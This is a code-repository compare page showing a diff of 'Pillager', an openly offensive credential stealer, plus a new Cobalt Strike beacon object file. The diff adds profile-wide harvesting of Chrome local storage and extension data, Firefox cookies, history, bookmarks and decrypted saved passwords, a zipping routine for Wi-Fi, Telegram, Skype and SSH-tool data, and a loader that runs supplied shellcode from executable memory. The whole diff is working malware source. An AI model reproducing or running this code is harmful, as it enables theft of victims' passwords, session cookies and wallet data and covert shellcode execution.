qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: qwqdanchun:24ddfbdf96e6ae8f787256fc27652e5ad135b464
Branches Tags
qwqdanchun:main
qwqdanchun:AutoBuild
...
compare: qwqdanchun:a0b85725aa2b9534e39d04f64461863ec579ae6b
Branches Tags
qwqdanchun:main
qwqdanchun:AutoBuild

3 Commits
24ddfbdf96 ... a0b85725aa

Author SHA1 Message Date
簞純 a0b85725aa Update FireFox.cs 2023-11-07 21:21:12 +08:00
簞純 8bf0b439d2 fix bugs 2023-11-07 20:36:10 +08:00
簞純 78d97d14da Create scloader.c 2023-11-07 19:18:46 +08:00
4 changed files with 181 additions and 165 deletions
Show Stats Expand all files Collapse all files

15
Pillager/Browsers/Chrome.cs
View File

@ -222,7 +222,7 @@ namespace Pillager.Browsers
public static void Save(string path)
{
foreach (var browser in Chrome.browserOnChromium)
foreach (var browser in browserOnChromium)
{
try
{
@ -230,7 +230,7 @@ namespace Pillager.Browsers
BrowserName = browser.Key;
BrowserPath = chromepath;
MasterKey = GetMasterKey();
if (MasterKey == null) return;
if (MasterKey == null) continue;
string savepath = Path.Combine(path, BrowserName);
Directory.CreateDirectory(savepath);
string cookies = Chrome_cookies();
@ -241,9 +241,14 @@ namespace Pillager.Browsers
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Storage"), Path.Combine(savepath, "Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Extension Settings"), Path.Combine(savepath, "Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Sync Extension Settings"), Path.Combine(savepath, "Sync Extension Settings"), true);
foreach (var profile in profiles)
{
Directory.CreateDirectory(Path.Combine(BrowserPath, profile));
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Storage"), Path.Combine(savepath, profile + "\\Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Extension Settings"), Path.Combine(savepath, profile + "\\Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"), Path.Combine(savepath, profile + "\\Sync Extension Settings"), true);
if (Directory.GetDirectories(Path.Combine(BrowserPath, profile)).Length == 0) Directory.Delete(Path.Combine(BrowserPath, profile));
}
}
catch { }
}

287
Pillager/Browsers/FireFox.cs
View File

@ -19,34 +19,30 @@ namespace Pillager.Browsers
public static string FireFox_cookies()
{
StringBuilder cookies = new StringBuilder();
string firefox_cookie_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(tmp))
string firefox_cookie_path = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(firefox_cookie_path))
{
firefox_cookie_path = tmp;
break;
try
{
string cookie_tempFile = Path.GetTempFileName();
File.Copy(firefox_cookie_path, cookie_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(cookie_tempFile);
if (!handler.ReadTable("moz_cookies"))
return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string host_key = handler.GetValue(i, "host");
string name = handler.GetValue(i, "name");
string cookie = handler.GetValue(i, "value");
cookies.AppendLine("[" + host_key + "] \t {" + name + "}={" + cookie + "}");
}
File.Delete(cookie_tempFile);
}
catch { }
}
}
if (!File.Exists(firefox_cookie_path)) return null;
try
{
string cookie_tempFile = Path.GetTempFileName();
File.Copy(firefox_cookie_path, cookie_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(cookie_tempFile);
if (!handler.ReadTable("moz_cookies"))
return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string host_key = handler.GetValue(i, "host");
string name = handler.GetValue(i, "name");
string cookie = handler.GetValue(i, "value");
cookies.AppendLine("[" + host_key + "] \t {" + name + "}={" + cookie + "}");
}
File.Delete(cookie_tempFile);
}
catch { }
}
return cookies.ToString();
}
@ -54,164 +50,153 @@ namespace Pillager.Browsers
public static string FireFox_history()
{
StringBuilder history = new StringBuilder();
string firefox_history_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_history_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_history_path))
{
firefox_history_path = tmp;
break;
try
{
string history_tempFile = Path.GetTempFileName();
File.Copy(firefox_history_path, history_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(history_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string url = handler.GetValue(i, "url");
history.AppendLine(url);
}
File.Delete(history_tempFile);
}
catch { }
}
}
if (!File.Exists(firefox_history_path)) return null;
try
{
string history_tempFile = Path.GetTempFileName();
File.Copy(firefox_history_path, history_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(history_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
string url = handler.GetValue(i, "url");
history.AppendLine(url);
}
File.Delete(history_tempFile);
}
catch { }
return history.ToString();
}
public static string FireFox_books()
{
StringBuilder books = new StringBuilder();
string firefox_books_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_books_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_books_path))
{
firefox_books_path = tmp;
break;
try
{
string books_tempFile = Path.GetTempFileName();
File.Copy(firefox_books_path, books_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_bookmarks")) return null;
List<string> fks = new List<string>();
for (int i = 0; i < handler.GetRowCount(); i++)
{
var fk = handler.GetValue(i, "fk");
if (fk != "0")
{
fks.Add(fk);
}
}
handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
var id = handler.GetRawID(i);
if (fks.Contains(id.ToString()))
{
books.AppendLine(handler.GetValue(i, "url"));
}
}
File.Delete(books_tempFile);
}
catch { }
}
}
if (!File.Exists(firefox_books_path)) return null;
try
{
string books_tempFile = Path.GetTempFileName();
File.Copy(firefox_books_path, books_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_bookmarks")) return null;
List<string> fks = new List<string>();
for (int i = 0; i < handler.GetRowCount(); i++)
{
var fk = handler.GetValue(i, "fk");
if (fk!="0")
{
fks.Add(fk);
}
}
handler = new SQLiteHandler(books_tempFile);
if (!handler.ReadTable("moz_places")) return null;
for (int i = 0; i < handler.GetRowCount(); i++)
{
var id = handler.GetRawID(i);
if (fks.Contains(id.ToString()))
{
books.AppendLine(handler.GetValue(i, "url"));
}
}
File.Delete(books_tempFile);
}
catch { }
return books.ToString();
}
public static string FireFox_passwords()
{
StringBuilder password = new StringBuilder();
string loginsJsonPath = "";
string keyDBPath = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp1 = Path.Combine(directory, "logins.json");
string tmp2 = Path.Combine(directory, "key4.db");
if (File.Exists(tmp1) && File.Exists(tmp2))
string loginsJsonPath = Path.Combine(directory, "logins.json");
string keyDBPath = Path.Combine(directory, "key4.db");
if (File.Exists(loginsJsonPath) && File.Exists(keyDBPath))
{
loginsJsonPath = tmp1;
keyDBPath = tmp2;
break;
}
}
if (!File.Exists(loginsJsonPath)|| !File.Exists(keyDBPath)) return null;
try
{
string password_keyDB_tempFile = Path.GetTempFileName();
File.Copy(keyDBPath, password_keyDB_tempFile, true);
string password_loginsJson_tempFile = Path.GetTempFileName();
File.Copy(loginsJsonPath, password_loginsJson_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("metadata")) return null;
Asn1Der asn = new Asn1Der();
for (int i = 0; i < handler.GetRowCount(); i++)
{
if (handler.GetValue(i, "id")!="password") continue;
byte[] item2Byte;
var globalSalt = Convert.FromBase64String(handler.GetValue(i, "item1"));
try
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2"));
}
catch
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2)"));
}
Asn1DerObject item2 = asn.Parse(item2Byte);
string asnString = item2.ToString();
if (asnString.Contains("2A864886F70D010C050103"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].Data;
var cipherText = item2.objects[0].objects[1].Data;
decryptMoz3DES CheckPwd = new decryptMoz3DES(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else if (asnString.Contains("2A864886F70D01050D"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var partIV = item2.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var cipherText = item2.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE CheckPwd = new MozillaPBE(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt, partIV);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else return null;
try
{
handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("nssPrivate")) return null;
for (int j = 0; j < handler.GetRowCount(); j++)
string password_keyDB_tempFile = Path.GetTempFileName();
File.Copy(keyDBPath, password_keyDB_tempFile, true);
string password_loginsJson_tempFile = Path.GetTempFileName();
File.Copy(loginsJsonPath, password_loginsJson_tempFile, true);
SQLiteHandler handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("metadata")) return null;
Asn1Der asn = new Asn1Der();
for (int i = 0; i < handler.GetRowCount(); i++)
{
var a11Byte = Convert.FromBase64String(handler.GetValue(j, "a11"));
Asn1DerObject a11ASNValue = asn.Parse(a11Byte);
var keyEntrySalt = a11ASNValue.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var keyPartIV = a11ASNValue.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var keyCipherText = a11ASNValue.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE PrivKey = new MozillaPBE(keyCipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), keyEntrySalt, keyPartIV);
var fullprivateKey = PrivKey.Compute();
byte[] privateKey = new byte[24];
Array.Copy(fullprivateKey, privateKey, privateKey.Length);
password.Append(decryptLogins(loginsJsonPath, privateKey));
if (handler.GetValue(i, "id") != "password") continue;
byte[] item2Byte;
var globalSalt = Convert.FromBase64String(handler.GetValue(i, "item1"));
try
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2"));
}
catch
{
item2Byte = Convert.FromBase64String(handler.GetValue(i, "item2)"));
}
Asn1DerObject item2 = asn.Parse(item2Byte);
string asnString = item2.ToString();
if (asnString.Contains("2A864886F70D010C050103"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].Data;
var cipherText = item2.objects[0].objects[1].Data;
decryptMoz3DES CheckPwd = new decryptMoz3DES(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else if (asnString.Contains("2A864886F70D01050D"))
{
var entrySalt = item2.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var partIV = item2.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var cipherText = item2.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE CheckPwd = new MozillaPBE(cipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), entrySalt, partIV);
var passwordCheck = CheckPwd.Compute();
string decryptedPwdChk = Encoding.GetEncoding("ISO-8859-1").GetString(passwordCheck);
if (!decryptedPwdChk.StartsWith("password-check")) return null;
}
else return null;
try
{
handler = new SQLiteHandler(password_keyDB_tempFile);
if (!handler.ReadTable("nssPrivate")) return null;
for (int j = 0; j < handler.GetRowCount(); j++)
{
var a11Byte = Convert.FromBase64String(handler.GetValue(j, "a11"));
Asn1DerObject a11ASNValue = asn.Parse(a11Byte);
var keyEntrySalt = a11ASNValue.objects[0].objects[0].objects[1].objects[0].objects[1].objects[0].Data;
var keyPartIV = a11ASNValue.objects[0].objects[0].objects[1].objects[2].objects[1].Data;
var keyCipherText = a11ASNValue.objects[0].objects[0].objects[1].objects[3].Data;
MozillaPBE PrivKey = new MozillaPBE(keyCipherText, globalSalt, Encoding.ASCII.GetBytes(masterPassword), keyEntrySalt, keyPartIV);
var fullprivateKey = PrivKey.Compute();
byte[] privateKey = new byte[24];
Array.Copy(fullprivateKey, privateKey, privateKey.Length);
password.Append(decryptLogins(loginsJsonPath, privateKey));
}
}
catch { }
}
File.Delete(password_keyDB_tempFile);
File.Delete(password_loginsJson_tempFile);
}
catch { }
}
File.Delete(password_keyDB_tempFile);
File.Delete(password_loginsJson_tempFile);
}
catch { }
return password.ToString();
}
@ -308,8 +293,8 @@ namespace Pillager.Browsers
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite")))
{
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite"), Path.Combine(savepath, "storage-sync-v2.sqlite"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2..sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2..sqlite-shm"), Path.Combine(savepath, "storage-sync-v2..sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-shm"), Path.Combine(savepath, "storage-sync-v2.sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-wal")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-wal"), Path.Combine(savepath, "storage-sync-v2.sqlite-wal"));
break;

18
Pillager/Program.cs
View File

@ -19,6 +19,15 @@ namespace Pillager
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
Chrome.Save(savepath);
FireFox.Save(savepath);
//Others
Wifi.Save(savepath);
//Tools
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
@ -28,15 +37,6 @@ namespace Pillager
Telegram.Save(savepath);
Skype.Save(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
FireFox.Save(savepath);
Chrome.Save(savepath);
//Others
Wifi.Save(savepath);
//ZIP
ZipFile.CreateFromDirectory(savepath, savezippath);
Directory.Delete(savepath, true);

26
cs-plugin/module/scloader.c Normal file
View File

@ -0,0 +1,26 @@
#include <windows.h>
#include "beacon.h"
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID);
VOID go(
IN PCHAR Buffer,
IN ULONG Length
)
{
datap parser;
LPBYTE lpShellcodeBuffer = NULL;
DWORD dwShellcodeBufferSize = 0;
LPVOID pMem;
SIZE_T bytesWritten = 0;
DWORD dwThreadId = 0;
BeaconDataParse(&parser, Buffer, Length);
lpShellcodeBuffer = (LPBYTE) BeaconDataExtract(&parser, (int*)(&dwShellcodeBufferSize));
pMem = KERNEL32$VirtualAlloc(0, dwShellcodeBufferSize,MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
KERNEL32$WriteProcessMemory(KERNEL32$GetCurrentProcess(), pMem, lpShellcodeBuffer, dwShellcodeBufferSize, &bytesWritten);
KERNEL32$CreateThread(0, 0, pMem, 0, 0, &dwThreadId);
}